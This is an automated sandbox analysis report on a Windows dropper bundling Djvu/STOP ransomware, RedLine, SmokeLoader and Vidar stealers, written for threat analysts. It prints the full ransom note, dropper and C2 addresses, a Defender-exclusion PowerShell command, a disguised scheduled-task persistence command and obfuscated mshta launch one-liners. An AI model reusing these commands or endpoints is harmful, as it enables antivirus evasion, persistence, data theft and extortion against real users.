Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

30-09-2021 05:45

210930-gf4veagef9 10

29-09-2021 21:32

210929-1dyp6agaam 10

29-09-2021 18:54

210929-xkfldaffb2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1806s
  • platform
    windows10_x64
  • resource
    win10-ja-20210920
  • submitted
    29-09-2021 18:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    7.1MB

  • MD5

    cd08a9c57ce8115745d3a99dec48847d

  • SHA1

    2ea5cea16935f511935a86ea7a2903a44d593247

  • SHA256

    52895feec7505eb0c3a418c93ecaf8559d4d7f9f67c68e3a268c606c069d04cc

  • SHA512

    0ad7757713eca784f6b8c50e1912f91264f0e210dd61e7a6e779390dc2040b6744d552aac120c2ec8d65bfbb048672cb7959d026691ef1037b63e24fec024233

Score
10/10
djvuredlinesmokeloadersocelarsvidaraniaspackv2backdoordiscoveryevasioninfostealerpersistenceransomwarespywarestealerthemidatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.top/welcome

Extracted

Path

C:\_readme.txt

Family

djvu

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-2zbBkO06mv Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: supporthelp@airmail.cc Your personal ID: 0335gSd743dEy1gd1zw5QaTuD9AdJnQXoohKZidIKAiW6h35Dxs
Emails

manager@mailtemp.ch

supporthelp@airmail.cc
URLs

https://we.tl/t-2zbBkO06mv

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/
rc4.i32
rc4.i32

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 3 IoCs
  • Registers COM server for autorun 1 TTPs
    persistence
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 4 IoCs
    stealer
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Blocklisted process makes network request 51 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 16 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 56 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 7 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 24 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 11 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 40 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 48 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 32 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Kills process with taskkill 11 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
    evasionspywaretrojan
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 21 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:368
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s BITS
      1⤵
      • Suspicious use of SetThreadContext
      PID:4508
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:5172
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2616
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
        • Modifies registry class
        PID:2552
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2544
          • C:\Windows\system32\wbem\WMIADAP.EXE
            wmiadap.exe /F /T /R
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:1536
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2356
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2328
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1960
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1456
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1280
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1272
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1124
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1056
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          2⤵
                          • Suspicious use of SetThreadContext
                          PID:1148
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            3⤵
                              PID:5272
                              • C:\Windows\SysWOW64\schtasks.exe
                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                4⤵
                                • Creates scheduled task(s)
                                PID:6924
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            2⤵
                            • Suspicious use of SetThreadContext
                            PID:7992
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              3⤵
                                PID:6792
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:748
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                3⤵
                                  PID:3352
                              • C:\Users\Admin\AppData\Roaming\wcitgcd
                                C:\Users\Admin\AppData\Roaming\wcitgcd
                                2⤵
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: MapViewOfSection
                                PID:6088
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:6320
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  3⤵
                                    PID:1336
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  2⤵
                                  • Suspicious use of SetThreadContext
                                  PID:5660
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    3⤵
                                      PID:7188
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    2⤵
                                    • Suspicious use of SetThreadContext
                                    PID:7872
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      3⤵
                                        PID:7824
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      2⤵
                                      • Suspicious use of SetThreadContext
                                      PID:2600
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        3⤵
                                          PID:5700
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        2⤵
                                        • Suspicious use of SetThreadContext
                                        PID:3312
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          3⤵
                                            PID:7812
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          2⤵
                                          • Suspicious use of SetThreadContext
                                          PID:8172
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            3⤵
                                              PID:1340
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            2⤵
                                            • Suspicious use of SetThreadContext
                                            PID:5816
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              3⤵
                                                PID:5396
                                            • C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe
                                              C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe --Task
                                              2⤵
                                              • Suspicious use of SetThreadContext
                                              PID:5300
                                              • C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe
                                                C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe --Task
                                                3⤵
                                                  PID:5392
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                2⤵
                                                • Suspicious use of SetThreadContext
                                                PID:5832
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  3⤵
                                                    PID:6988
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  2⤵
                                                  • Suspicious use of SetThreadContext
                                                  PID:6440
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    3⤵
                                                      PID:4640
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    2⤵
                                                    • Suspicious use of SetThreadContext
                                                    PID:5892
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      3⤵
                                                        PID:4116
                                                    • C:\Users\Admin\AppData\Roaming\wcitgcd
                                                      C:\Users\Admin\AppData\Roaming\wcitgcd
                                                      2⤵
                                                      • Checks SCSI registry key(s)
                                                      • Suspicious behavior: MapViewOfSection
                                                      PID:3948
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      2⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:1020
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        3⤵
                                                          PID:5408
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        2⤵
                                                        • Suspicious use of SetThreadContext
                                                        PID:3716
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          3⤵
                                                            PID:6028
                                                        • C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe
                                                          C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe --Task
                                                          2⤵
                                                          • Suspicious use of SetThreadContext
                                                          PID:7296
                                                          • C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe
                                                            C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe --Task
                                                            3⤵
                                                              PID:4080
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            2⤵
                                                            • Suspicious use of SetThreadContext
                                                            PID:7900
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              3⤵
                                                                PID:5660
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              2⤵
                                                              • Suspicious use of SetThreadContext
                                                              PID:524
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                3⤵
                                                                  PID:5932
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                2⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:6080
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  3⤵
                                                                    PID:7880
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  2⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:3928
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    3⤵
                                                                      PID:3132
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    2⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:6288
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      3⤵
                                                                        PID:4788
                                                                    • C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe
                                                                      C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe --Task
                                                                      2⤵
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:7480
                                                                      • C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe
                                                                        C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe --Task
                                                                        3⤵
                                                                          PID:6640
                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                        2⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:7352
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          3⤵
                                                                            PID:7256
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          2⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:6264
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            3⤵
                                                                              PID:8132
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            2⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:7884
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              3⤵
                                                                                PID:6036
                                                                            • C:\Users\Admin\AppData\Roaming\wcitgcd
                                                                              C:\Users\Admin\AppData\Roaming\wcitgcd
                                                                              2⤵
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:6356
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              2⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:6268
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                3⤵
                                                                                  PID:6132
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                2⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:4276
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  3⤵
                                                                                    PID:8172
                                                                                • C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe
                                                                                  C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe --Task
                                                                                  2⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:6904
                                                                                  • C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe
                                                                                    C:\Users\Admin\AppData\Local\71a568c4-992d-4868-be5a-2282f1e3c5e3\C08D.exe --Task
                                                                                    3⤵
                                                                                      PID:3624
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    2⤵
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:7000
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      3⤵
                                                                                        PID:5392
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      2⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:7832
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        3⤵
                                                                                          PID:5532
                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                                                                      1⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3908
                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:748
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\setup_install.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\setup_install.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4132
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                            4⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4360
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                              5⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1196
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Wed151f5e3fd2.exe
                                                                                            4⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4356
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed151f5e3fd2.exe
                                                                                              Wed151f5e3fd2.exe
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:932
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c Wed1529d8198a8f0c1.exe
                                                                                            4⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4248
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCE2E6403\Wed1529d8198a8f0c1.exe
                                                                                              Wed1529d8198a8f0c1.exe
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:1012
                                                                                              • C:\Users\Admin\AppData\Roaming\4992813.scr
                                                                                                "C:\Users\Admin\AppData\Roaming\4992813.scr" /S
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4372
                                                                                              • C:\Users\Admin\AppData\Roaming\1120010.scr
                                                                                                "C:\Users\Admin\AppData\Roaming\1120010.scr" /S
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                PID:4896
                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4100
                                                                                              • C:\Users\Admin\AppData\Roaming\6931000.scr
                                                                                                "C:\Users\Admin\AppData\Roaming\6931000.scr" /S
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:3624
                                                                                              • C:\Users\Admin\AppData\Roaming\4043723.scr
                                                                                                "C:\Users\Admin\AppData\Roaming\4043723.scr" /S
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks whether UAC is enabled
                                                                                                PID:6004
                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                  "C:\Windows\System32\mshta.exe" vBSCrIpt:CLose ( cREAteObjecT ("wScrIPT.ShELL" ). RuN ("CMD.ExE /R TYPE ""C:\Users\Admin\AppData\Roaming\4043723.scr"" > S97FKkMft.eXE && StaRt S97FKKMfT.ExE /pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK& IF ""/S"" == """" for %Q iN ( ""C:\Users\Admin\AppData\Roaming\4043723.scr"" ) do taskkill -iM ""%~NxQ"" /F " , 0 , TRUE ) )
                                                                                                  7⤵
                                                                                                    PID:4940
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /R TYPE "C:\Users\Admin\AppData\Roaming\4043723.scr" > S97FKkMft.eXE && StaRt S97FKKMfT.ExE /pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK& IF "/S" == "" for %Q iN ( "C:\Users\Admin\AppData\Roaming\4043723.scr" ) do taskkill -iM "%~NxQ" /F
                                                                                                      8⤵
                                                                                                        PID:5260
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\S97FKkMft.eXE
                                                                                                          S97FKKMfT.ExE /pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK
                                                                                                          9⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks whether UAC is enabled
                                                                                                          PID:6320
                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                            "C:\Windows\System32\mshta.exe" vBSCrIpt:CLose ( cREAteObjecT ("wScrIPT.ShELL" ). RuN ("CMD.ExE /R TYPE ""C:\Users\Admin\AppData\Local\Temp\S97FKkMft.eXE"" > S97FKkMft.eXE && StaRt S97FKKMfT.ExE /pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK& IF ""/pCoj8sO2ZQIDueyiPfNb5DUkuG7xWcK"" == """" for %Q iN ( ""C:\Users\Admin\AppData\Local\Temp\S97FKkMft.eXE"" ) do taskkill -iM ""%~NxQ"" /F " , 0 , TRUE ) )
